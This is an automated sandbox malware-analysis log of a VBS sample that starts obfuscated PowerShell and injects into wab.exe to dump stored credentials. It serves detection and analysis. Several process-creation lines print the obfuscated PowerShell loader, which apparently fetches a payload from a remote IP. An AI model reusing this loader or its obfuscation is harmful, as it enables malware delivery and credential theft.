                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004079EE14_2_004079EE
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00407AEB14_2_00407AEB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044AA8014_2_0044AA80
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00412AA914_2_00412AA9
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00404B7414_2_00404B74
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00404B0314_2_00404B03
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044BBD814_2_0044BBD8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00404BE514_2_00404BE5
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00404C7614_2_00404C76
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00415CFE14_2_00415CFE
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00416D7214_2_00416D72
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00446D3014_2_00446D30
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00446D8B14_2_00446D8B
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00406E8F14_2_00406E8F
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0040503815_2_00405038
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0041208C15_2_0041208C
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_004050A915_2_004050A9
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0040511A15_2_0040511A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0043C13A15_2_0043C13A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_004051AB15_2_004051AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0044930015_2_00449300
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0040D32215_2_0040D322
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0044A4F015_2_0044A4F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0043A5AB15_2_0043A5AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0041363115_2_00413631
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0044669015_2_00446690
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0044A73015_2_0044A730
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_004398D815_2_004398D8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_004498E015_2_004498E0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0044A88615_2_0044A886
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0043DA0915_2_0043DA09
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00438D5E15_2_00438D5E
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00449ED015_2_00449ED0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0041FE8315_2_0041FE83
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00430F5415_2_00430F54
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004050C216_2_004050C2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004014AB16_2_004014AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040513316_2_00405133
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004051A416_2_004051A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040124616_2_00401246
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040CA4616_2_0040CA46
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040523516_2_00405235
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004032C816_2_004032C8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040168916_2_00401689
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00402F6016_2_00402F60
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00444B5A appears 37 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00413025 appears 79 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
                Source: SOA.vbsInitial sample: Strings found which are bigger than 50
                Source: amsi32_5512.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3516, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 5512, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winVBS@19/14@1/3
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,14_2_004182CE
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,16_2_00410DE1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,14_2_00418758
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,14_2_00413D4C
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,14_2_0040B58D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Dobbeltrudens140.AffJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-SACUXX
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6112:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3784:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ja312hy.thz.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3516
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5512
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: wab.exe, wab.exe, 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: wab.exe, wab.exe, 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: wab.exe, 0000000A.00000002.3385163166.00000000217B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: wab.exe, wab.exe, 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: wab.exe, wab.exe, 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: wab.exe, wab.exe, 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: wab.exe, 0000000E.00000003.2602870867.00000000052F5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.2605548747.00000000052F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: wab.exe, wab.exe, 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_15-33261
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dobbeltrudens140.Aff && echo t"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dobbeltrudens140.Aff && echo t"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xmgittpzhob"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iglbtlabvwtooe"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\kiztuekujelbqlwip"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dobbeltrudens140.Aff && echo t"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteerJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dobbeltrudens140.Aff && echo t"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xmgittpzhob"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iglbtlabvwtooe"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\kiztuekujelbqlwip"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
